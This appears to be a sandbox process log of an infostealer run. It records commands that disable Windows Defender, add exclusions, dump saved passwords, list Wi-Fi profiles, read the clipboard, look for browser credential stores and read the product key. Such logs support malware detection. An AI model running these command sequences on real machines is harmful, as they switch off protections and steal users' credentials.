C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tree.com

tree /A /F

C:\Users\Admin\AppData\Local\Temp\_MEI42562\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Users\Admin\AppData\Local\Temp\_MEI55522\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c cls

C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"

C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\Vanguardmapper.exe"

C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe

"C:\Users\Admin\Desktop\VANTA\x64\Release\mapper.exe"

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Users\Admin\Downloads\vt.exe

"C:\Users\Admin\Downloads\vt.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\vt.exe'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\vt.exe'

C:\Windows\system32\net.exe

net session

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\vt.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Unblock-File '.\getPass'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Unblock-File '.\getPass'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "where /r . *.sqlite"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "dir leveldb /AD /s /b"

C:\Windows\system32\where.exe

where /r . *.sqlite

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getPass.exe /stext pass.txt"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Users\Admin\AppData\Local\Temp\_MEI21802\getPass.exe

getPass.exe /stext pass.txt

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0x78,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3448 /prefetch:8

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5540 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5168 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4024 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6072 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,9736024279249330884,16395482523049211172,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe

